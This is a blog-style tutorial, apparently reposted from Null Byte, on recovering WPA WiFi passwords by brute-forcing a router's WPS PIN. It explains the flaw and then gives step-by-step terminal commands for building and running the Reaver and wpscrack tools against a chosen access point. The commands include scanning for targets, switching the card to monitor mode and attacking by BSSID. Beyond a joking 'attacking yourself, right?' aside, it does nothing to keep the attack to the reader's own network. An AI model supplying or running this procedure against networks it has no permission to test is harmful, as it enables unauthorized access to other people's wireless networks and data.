How to Hack WPA WiFi Passwords by Cracking the WPS PIN

A flaw in WPS, or WiFi Protected Setup, known about for over a year by TNS, was finally exploited with proof of concept code. Both TNS, the discoverers of the exploit and Stefan at .braindump have created their respective "reaver" and "wpscrack" programs to exploit the WPS vulnerability. From this exploit, the WPA password can be recovered almost instantly in plain-text once the attack on the access point WPS is initiated, which normally takes 2-10 hours (depending on which program you use).

This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN, the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA.
In thisNull Byte, let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.

Requirements

  • Linux OS
  • A router at home with WPS
  • The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev

Tools

  • Reaver (support for all routers)
  • wpscrack (faster, but only support for major router brands)

Crack WPS

Text in bold is a terminal command.
Follow the guide that corresponds to the tool that you chose to use below.

Reaver

  1. Unzip Reaver.
  • unzip reaver-1.3.tar.gz
  1. Change to the Reaver directory.
  • cd reaver-1.3
  1. Configure, compile and install the application.
  • ./configure && make && sudo make install
  1. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
  • sudo iwlist scan wlan0
  1. Set your device into monitor mode.
  • sudo airmon-ng start wlan0
  1. Run the tool against an access point.
  • reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
  1. Wait until it finishes.
This tool makes it too easy.

wpscrack.py

  1. Make the program an executable.
  • chmod +x wpscrack.py
  1. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
  • sudo iwlist scan wlan0
  1. Get your MAC address, save it for later.
  • ip link show wlan0 | awk '/ether/ {print $2}'
  1. Set your device into monitor mode.
  • sudo airmon-ng start wlan0
  1. Attack your AP.
  • wpscrack.py –iface mon0 –client <your MAC, because you're attacking yourself, right?> –bssid <AP MAC address> --ssid <name of your AP> -v
  1. Await victory.
Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.

No comments:

Post a Comment